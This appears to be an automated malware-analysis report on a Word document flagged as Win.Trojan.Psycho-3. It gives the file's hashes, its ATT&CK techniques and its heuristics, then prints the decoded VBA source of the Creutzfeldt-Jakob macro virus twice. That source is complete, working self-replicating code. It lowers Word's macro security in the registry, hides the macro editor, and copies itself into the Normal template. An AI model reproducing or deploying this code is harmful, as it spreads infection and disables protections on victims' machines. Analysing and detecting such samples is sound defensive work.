Office (OLE) malware analysis — malicious · 6f59eeff0082f072

MALICIOUS

Office (OLE)

31.5 KB Created: 2001-06-26 20:46:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: 3cd7b9f746467be3ffe408a2798abfae SHA-1: e8e8b9aac85babb1fd9369700b92abd4e5266e22 SHA-256: 6f59eeff0082f0728fafe15786c96e0a892f58376a7765fe856f6aa1a2c0c42a

120 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The file is a malicious Word document containing VBA macros, specifically a Document_Open macro. This macro attempts to lower macro security settings and disable the macro menu item, likely to facilitate further malicious activity. The ClamAV detection as 'Win.Trojan.Psycho-3' further supports its malicious nature. The script's actions suggest an attempt to establish persistence and evade detection.

Heuristics 3

ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Psycho-3
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3331 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3331 bytes
SHA-256: `1d35d991604a85b94389b505c767aa763148f510643f29f5f3f243c3840da8c3`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Creutzfeldt_Jakob" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& CommandBars("Tools").Controls("Macro").Enabled = False Normal_PathName = NormalTemplate.FullName Attribs = GetAttr(Normal_PathName) And vbReadOnly If Attribs = 1 Then SetAttr Normal_PathName, vbArchive Or vbNormal Else CustomizationContext = NormalTemplate FindKey(BuildKeyCode(wdKeyAlt, wdKeyF11)).Clear FindKey(BuildKeyCode(wdKeyAlt, wdKeyF11)).Disable End If Set xActual = ActiveDocument.VBProject.VBComponents.Item(1) Set xNormal = NormalTemplate.VBProject.VBComponents.Item(1) Code_Normal = xNormal.CodeModule.CountOfLines Code_Actual = xActual.CodeModule.CountOfLines If xNormal.Name <> "Creutzfeldt_Jakob" And Attribs <> 1 Then xNormal.Name = "Creutzfeldt_Jakob" Do While Code_Normal > 0 xNormal.CodeModule.DeleteLines 1 Code_Normal = Code_Normal - 1 Loop Counter = 1 Do While xActual.CodeModule.Lines(Counter, 1) <> "" xNormal.CodeModule.InsertLines Counter, xActual.CodeModule.Lines(Counter, 1) Counter = Counter + 1 Loop ElseIf xActual.Name <> "Creutzfeldt_Jakob" Then xActual.Name = "Creutzfeldt_Jakob" Do While Code_Actual > 0 xActual.CodeModule.DeleteLines 1 Code_Actual = Code_Actual - 1 Loop Counter = 1 Do While xNormal.CodeModule.Lines(Counter, 1) <> "" xActual.CodeModule.InsertLines Counter, xNormal.CodeModule.Lines(Counter, 1) Counter = Counter + 1 Loop End If Randomize PayDay = Int((31 - 1 + 1) * Rnd() + 1) If PayDay = Day(Now) And ((Minute(Now) <= 15) Or (Minute(Now) >= 30 And Minute(Now) <= 45)) Then Selection.Font.Name = "Courier" Selection.Font.Size = 10 Selection.Font.Bold = True Selection.Font.Color = wdColorAutomatic Selection.TypeText " (__) (__) (__) (__) (__)" Selection.TypeParagraph Selection.TypeText " (@@) (@@) (@@) (@@) (@@)" Selection.TypeParagraph Selection.TypeText " /-------\/ /-------\/ /-------\/ /-------\/ /-------\/" Selection.TypeParagraph Selection.TypeText " / \| \|\| / \| \|\| / \| \|\| / \| \|\| / \| \|\|" Selection.TypeParagraph Selection.TypeText " * \|\|----\|\| * \|\|----\|\| * \|\|----\|\| * \|\|----\|\| * \|\|----\|\|" Selection.TypeParagraph Selection.TypeText " ^^ ^^ ^^ ^^ ^^ ^^ ^^ ^^ ^^ ^^" Selection.TypeParagraph Selection.Font.Color = wdColorBlue Selection.TypeText "W2000M/Creutzfeldt-Jakob Macro Virus" Selection.TypeParagraph Selection.TypeText "(c)2001 by Tokugawa Ieyasu" Selection.TypeParagraph End If If InStr(1, ActiveDocument.Name, "Document") = False Then ActiveDocument.SaveAs ActiveDocument.FullName Else ActiveDocument.Saved = True End If End Sub

SHA-256: 1d35d991604a85b94389b505c767aa763148f510643f29f5f3f243c3840da8c3

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Creutzfeldt_Jakob"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
CommandBars("Tools").Controls("Macro").Enabled = False
Normal_PathName = NormalTemplate.FullName
Attribs = GetAttr(Normal_PathName) And vbReadOnly
If Attribs = 1 Then
    SetAttr Normal_PathName, vbArchive Or vbNormal
Else
    CustomizationContext = NormalTemplate
    FindKey(BuildKeyCode(wdKeyAlt, wdKeyF11)).Clear
    FindKey(BuildKeyCode(wdKeyAlt, wdKeyF11)).Disable
End If
Set xActual = ActiveDocument.VBProject.VBComponents.Item(1)
Set xNormal = NormalTemplate.VBProject.VBComponents.Item(1)
Code_Normal = xNormal.CodeModule.CountOfLines
Code_Actual = xActual.CodeModule.CountOfLines
If xNormal.Name <> "Creutzfeldt_Jakob" And Attribs <> 1 Then
    xNormal.Name = "Creutzfeldt_Jakob"
    Do While Code_Normal > 0
        xNormal.CodeModule.DeleteLines 1
        Code_Normal = Code_Normal - 1
    Loop
    Counter = 1
    Do While xActual.CodeModule.Lines(Counter, 1) <> ""
        xNormal.CodeModule.InsertLines Counter, xActual.CodeModule.Lines(Counter, 1)
        Counter = Counter + 1
    Loop
ElseIf xActual.Name <> "Creutzfeldt_Jakob" Then
    xActual.Name = "Creutzfeldt_Jakob"
    Do While Code_Actual > 0
        xActual.CodeModule.DeleteLines 1
        Code_Actual = Code_Actual - 1
    Loop
    Counter = 1
    Do While xNormal.CodeModule.Lines(Counter, 1) <> ""
        xActual.CodeModule.InsertLines Counter, xNormal.CodeModule.Lines(Counter, 1)
        Counter = Counter + 1
    Loop
End If
Randomize
PayDay = Int((31 - 1 + 1) * Rnd() + 1)
If PayDay = Day(Now) And ((Minute(Now) <= 15) Or (Minute(Now) >= 30 And Minute(Now) <= 45)) Then
    Selection.Font.Name = "Courier"
    Selection.Font.Size = 10
    Selection.Font.Bold = True
    Selection.Font.Color = wdColorAutomatic
    Selection.TypeText "          (__)          (__)          (__)          (__)          (__)"
    Selection.TypeParagraph
    Selection.TypeText "          (@@)          (@@)          (@@)          (@@)          (@@)"
    Selection.TypeParagraph
    Selection.TypeText "   /-------\/    /-------\/    /-------\/    /-------\/    /-------\/"
    Selection.TypeParagraph
    Selection.TypeText "  / |     ||    / |     ||    / |     ||    / |     ||    / |     ||"
    Selection.TypeParagraph
    Selection.TypeText " *  ||----||   *  ||----||   *  ||----||   *  ||----||   *  ||----||"
    Selection.TypeParagraph
    Selection.TypeText "    ^^    ^^      ^^    ^^      ^^    ^^      ^^    ^^      ^^    ^^"
    Selection.TypeParagraph
    Selection.Font.Color = wdColorBlue
    Selection.TypeText "W2000M/Creutzfeldt-Jakob Macro Virus"
    Selection.TypeParagraph
    Selection.TypeText "(c)2001 by Tokugawa Ieyasu"
    Selection.TypeParagraph
End If
If InStr(1, ActiveDocument.Name, "Document") = False Then
    ActiveDocument.SaveAs ActiveDocument.FullName
Else
    ActiveDocument.Saved = True
End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.